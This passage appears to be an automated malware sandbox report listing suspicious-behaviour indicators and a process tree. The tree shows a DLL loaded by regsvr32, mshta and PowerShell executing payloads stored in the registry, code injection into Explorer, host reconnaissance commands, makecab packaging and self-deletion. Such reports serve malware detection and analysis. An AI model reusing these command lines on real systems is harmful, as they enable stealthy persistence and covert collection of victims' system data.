3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE -
Suspicious behavior: MapViewOfSection 6 IoCs
pid Process 3916 powershell.exe 3032 Explorer.EXE 3032 Explorer.EXE 812 cmd.exe 3032 Explorer.EXE 3032 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 17 IoCs
description pid Process Token: SeDebugPrivilege 3916 powershell.exe Token: SeShutdownPrivilege 3032 Explorer.EXE Token: SeCreatePagefilePrivilege 3032 Explorer.EXE Token: SeRestorePrivilege 2536 WerFault.exe Token: SeBackupPrivilege 2536 WerFault.exe Token: SeDebugPrivilege 2536 WerFault.exe Token: SeShutdownPrivilege 3032 Explorer.EXE Token: SeCreatePagefilePrivilege 3032 Explorer.EXE Token: SeShutdownPrivilege 3032 Explorer.EXE Token: SeCreatePagefilePrivilege 3032 Explorer.EXE Token: SeShutdownPrivilege 3032 Explorer.EXE Token: SeCreatePagefilePrivilege 3032 Explorer.EXE Token: SeShutdownPrivilege 3032 Explorer.EXE Token: SeCreatePagefilePrivilege 3032 Explorer.EXE Token: SeDebugPrivilege 1640 tasklist.exe Token: SeShutdownPrivilege 3032 Explorer.EXE Token: SeCreatePagefilePrivilege 3032 Explorer.EXE -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 3676 iexplore.exe 3536 iexplore.exe 3536 iexplore.exe 3536 iexplore.exe -
Suspicious use of SetWindowsHookEx 17 IoCs
pid Process 3676 iexplore.exe 3676 iexplore.exe 1444 IEXPLORE.EXE 1444 IEXPLORE.EXE 3536 iexplore.exe 3536 iexplore.exe 3900 IEXPLORE.EXE 3900 IEXPLORE.EXE 3536 iexplore.exe 3536 iexplore.exe 2120 IEXPLORE.EXE 2120 IEXPLORE.EXE 3536 iexplore.exe 3536 iexplore.exe 3900 IEXPLORE.EXE 3900 IEXPLORE.EXE 3032 Explorer.EXE -
Suspicious use of WriteProcessMemory 103 IoCs
description pid Process procid_target PID 500 wrote to memory of 1412 500 regsvr32.exe 72 PID 500 wrote to memory of 1412 500 regsvr32.exe 72 PID 500 wrote to memory of 1412 500 regsvr32.exe 72 PID 3676 wrote to memory of 1444 3676 iexplore.exe 78 PID 3676 wrote to memory of 1444 3676 iexplore.exe 78 PID 3676 wrote to memory of 1444 3676 iexplore.exe 78 PID 3536 wrote to memory of 3900 3536 iexplore.exe 83 PID 3536 wrote to memory of 3900 3536 iexplore.exe 83 PID 3536 wrote to memory of 3900 3536 iexplore.exe 83 PID 3536 wrote to memory of 2120 3536 iexplore.exe 84 PID 3536 wrote to memory of 2120 3536 iexplore.exe 84 PID 3536 wrote to memory of 2120 3536 iexplore.exe 84 PID 992 wrote to memory of 3916 992 mshta.exe 87 PID 992 wrote to memory of 3916 992 mshta.exe 87 PID 3916 wrote to memory of 2896 3916 powershell.exe 89 PID 3916 wrote to memory of 2896 3916 powershell.exe 89 PID 2896 wrote to memory of 3212 2896 csc.exe 90 PID 2896 wrote to memory of 3212 2896 csc.exe 90 PID 3916 wrote to memory of 628 3916 powershell.exe 91 PID 3916 wrote to memory of 628 3916 powershell.exe 91 PID 628 wrote to memory of 204 628 csc.exe 92 PID 628 wrote to memory of 204 628 csc.exe 92 PID 3916 wrote to memory of 3032 3916 powershell.exe 57 PID 3916 wrote to memory of 3032 3916 powershell.exe 57 PID 3916 wrote to memory of 3032 3916 powershell.exe 57 PID 3916 wrote to memory of 3032 3916 powershell.exe 57 PID 3032 wrote to memory of 812 3032 Explorer.EXE 93 PID 3032 wrote to memory of 812 3032 Explorer.EXE 93 PID 3032 wrote to memory of 812 3032 Explorer.EXE 93 PID 3032 wrote to memory of 3416 3032 Explorer.EXE 60 PID 3032 wrote to memory of 3416 3032 Explorer.EXE 60 PID 3032 wrote to memory of 812 3032 Explorer.EXE 93 PID 3032 wrote to memory of 3416 3032 Explorer.EXE 60 PID 3032 wrote to memory of 3416 3032 Explorer.EXE 60 PID 3032 wrote to memory of 812 3032 Explorer.EXE 93 PID 812 wrote to memory of 3924 812 cmd.exe 95 PID 812 wrote to memory of 3924 812 cmd.exe 95 PID 812 wrote to memory of 3924 812 cmd.exe 95 PID 812 wrote to memory of 3924 812 cmd.exe 95 PID 812 wrote to memory of 3924 812 cmd.exe 95 PID 3032 wrote to memory of 3936 3032 Explorer.EXE 97 PID 3032 wrote to memory of 3936 3032 Explorer.EXE 97 PID 3936 wrote to memory of 936 3936 cmd.exe 99 PID 3936 wrote to memory of 936 3936 cmd.exe 99 PID 3032 wrote to memory of 3864 3032 Explorer.EXE 101 PID 3032 wrote to memory of 3864 3032 Explorer.EXE 101 PID 3032 wrote to memory of 200 3032 Explorer.EXE 103 PID 3032 wrote to memory of 200 3032 Explorer.EXE 103 PID 200 wrote to memory of 4052 200 cmd.exe 105 PID 200 wrote to memory of 4052 200 cmd.exe 105 PID 3032 wrote to memory of 3408 3032 Explorer.EXE 107 PID 3032 wrote to memory of 3408 3032 Explorer.EXE 107 PID 3032 wrote to memory of 3408 3032 Explorer.EXE 107 PID 3032 wrote to memory of 3408 3032 Explorer.EXE 107 PID 3032 wrote to memory of 3408 3032 Explorer.EXE 107 PID 3032 wrote to memory of 3948 3032 Explorer.EXE 108 PID 3032 wrote to memory of 3948 3032 Explorer.EXE 108 PID 3032 wrote to memory of 3948 3032 Explorer.EXE 108 PID 3032 wrote to memory of 3948 3032 Explorer.EXE 108 PID 3032 wrote to memory of 3948 3032 Explorer.EXE 108 PID 3032 wrote to memory of 3948 3032 Explorer.EXE 108 PID 3032 wrote to memory of 4016 3032 Explorer.EXE 110 PID 3032 wrote to memory of 4016 3032 Explorer.EXE 110 PID 3032 wrote to memory of 3672 3032 Explorer.EXE 111 PID 3032 wrote to memory of 3672 3032 Explorer.EXE 111 PID 3032 wrote to memory of 1856 3032 Explorer.EXE 114 PID 3032 wrote to memory of 1856 3032 Explorer.EXE 114 PID 3032 wrote to memory of 3888 3032 Explorer.EXE 116 PID 3032 wrote to memory of 3888 3032 Explorer.EXE 116 PID 3032 wrote to memory of 2504 3032 Explorer.EXE 118 PID 3032 wrote to memory of 2504 3032 Explorer.EXE 118 PID 2504 wrote to memory of 3684 2504 cmd.exe 120 PID 2504 wrote to memory of 3684 2504 cmd.exe 120 PID 3032 wrote to memory of 3580 3032 Explorer.EXE 121 PID 3032 wrote to memory of 3580 3032 Explorer.EXE 121 PID 3032 wrote to memory of 1432 3032 Explorer.EXE 123 PID 3032 wrote to memory of 1432 3032 Explorer.EXE 123 PID 1432 wrote to memory of 3384 1432 cmd.exe 125 PID 1432 wrote to memory of 3384 1432 cmd.exe 125 PID 3032 wrote to memory of 2344 3032 Explorer.EXE 126 PID 3032 wrote to memory of 2344 3032 Explorer.EXE 126 PID 3032 wrote to memory of 4016 3032 Explorer.EXE 128 PID 3032 wrote to memory of 4016 3032 Explorer.EXE 128 PID 4016 wrote to memory of 1640 4016 cmd.exe 130 PID 4016 wrote to memory of 1640 4016 cmd.exe 130 PID 3032 wrote to memory of 2792 3032 Explorer.EXE 131 PID 3032 wrote to memory of 2792 3032 Explorer.EXE 131 PID 3032 wrote to memory of 1800 3032 Explorer.EXE 133 PID 3032 wrote to memory of 1800 3032 Explorer.EXE 133 PID 1800 wrote to memory of 2204 1800 cmd.exe 135 PID 1800 wrote to memory of 2204 1800 cmd.exe 135 PID 3032 wrote to memory of 1620 3032 Explorer.EXE 136 PID 3032 wrote to memory of 1620 3032 Explorer.EXE 136 PID 3032 wrote to memory of 2856 3032 Explorer.EXE 138 PID 3032 wrote to memory of 2856 3032 Explorer.EXE 138 PID 2856 wrote to memory of 904 2856 cmd.exe 140 PID 2856 wrote to memory of 904 2856 cmd.exe 140 PID 3032 wrote to memory of 3936 3032 Explorer.EXE 141 PID 3032 wrote to memory of 3936 3032 Explorer.EXE 141 PID 3032 wrote to memory of 3608 3032 Explorer.EXE 143 PID 3032 wrote to memory of 3608 3032 Explorer.EXE 143 PID 3032 wrote to memory of 3548 3032 Explorer.EXE 145 PID 3032 wrote to memory of 3548 3032 Explorer.EXE 145
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\c9d954b3f1c512e6804fd8f5637b58b6.dll2⤵
- Suspicious use of WriteProcessMemory
PID:500 -
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\c9d954b3f1c512e6804fd8f5637b58b6.dll3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1412 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1412 -s 7444⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2536
-
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\BFC92168-124C-49FC-1463-668D8847FA11\\\AppXxSip'));if(!window.flag)close()</script>"2⤵
- Suspicious use of WriteProcessMemory
PID:992 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\BFC92168-124C-49FC-1463-668D8847FA11").ActitLog))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3916 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uvpfzcuv\uvpfzcuv.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES82DD.tmp" "c:\Users\Admin\AppData\Local\Temp\uvpfzcuv\CSC762E9322FD8847EEA6EF987750CC2060.TMP"5⤵PID:3212
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ige3kt1e\ige3kt1e.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:628 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES84E0.tmp" "c:\Users\Admin\AppData\Local\Temp\ige3kt1e\CSC998CA52485224B93909351B159363957.TMP"5⤵PID:204
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\c9d954b3f1c512e6804fd8f5637b58b6.dll"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:812 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3924
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\B362.bi1"2⤵
- Suspicious use of WriteProcessMemory
PID:3936 -
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:936
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B362.bi1"2⤵PID:3864
-
-
C:\Windows\system32\cmd.execmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\E8AD.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:200 -
C:\Windows\system32\systeminfo.exesysteminfo.exe3⤵
- Gathers system information
PID:4052
-
-
-
C:\Program Files\Windows Mail\WinMail.exe"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE2⤵PID:3408
-
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:3948
-
-
C:\Windows\system32\makecab.exemakecab.exe /F "C:\Users\Admin\AppData\Local\Temp\742B.bin"2⤵PID:4016
-
-
C:\Windows\system32\makecab.exemakecab.exe /F "C:\Users\Admin\AppData\Local\Temp\3F35.bin"2⤵PID:3672
-
-
C:\Windows\system32\makecab.exemakecab.exe /F "C:\Users\Admin\AppData\Local\Temp\1289.bin"2⤵PID:1856
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\E8AD.bin1"2⤵PID:3888
-
-
C:\Windows\system32\cmd.execmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\E8AD.bin1"2⤵PID:2504
-
C:\Windows\system32\net.exenet view3⤵
- Discovers systems in the same network
PID:3684
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\E8AD.bin1"2⤵PID:3580
-
-
C:\Windows\system32\cmd.execmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\E8AD.bin1"2⤵PID:1432
-
C:\Windows\system32\nslookup.exenslookup 127.0.0.13⤵PID:3384
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\E8AD.bin1"2⤵PID:2344
-
-
C:\Windows\system32\cmd.execmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\E8AD.bin1"2⤵PID:4016
-
C:\Windows\system32\tasklist.exetasklist.exe /SVC3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1640
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\E8AD.bin1"2⤵PID:2792
-
-
C:\Windows\system32\cmd.execmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\E8AD.bin1"2⤵PID:1800
-
C:\Windows\system32\driverquery.exedriverquery.exe3⤵PID:2204
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\E8AD.bin1"2⤵PID:1620
-
-
C:\Windows\system32\cmd.execmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\E8AD.bin1"2⤵PID:2856
-
C:\Windows\system32\reg.exereg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s3⤵PID:904
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\E8AD.bin1"2⤵PID:3936
-
-
C:\Windows\system32\cmd.execmd /U /C "type C:\Users\Admin\AppData\Local\Temp\E8AD.bin1 > C:\Users\Admin\AppData\Local\Temp\E8AD.bin & del C:\Users\Admin\AppData\Local\Temp\E8AD.bin1"2⤵PID:3608
-
-
C:\Windows\system32\makecab.exemakecab.exe /F "C:\Users\Admin\AppData\Local\Temp\8453.bin"2⤵PID:3548
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3416
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3676 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3676 CREDAT:82945 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1444
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3536 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3536 CREDAT:82945 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3900
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3536 CREDAT:82952 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2120
-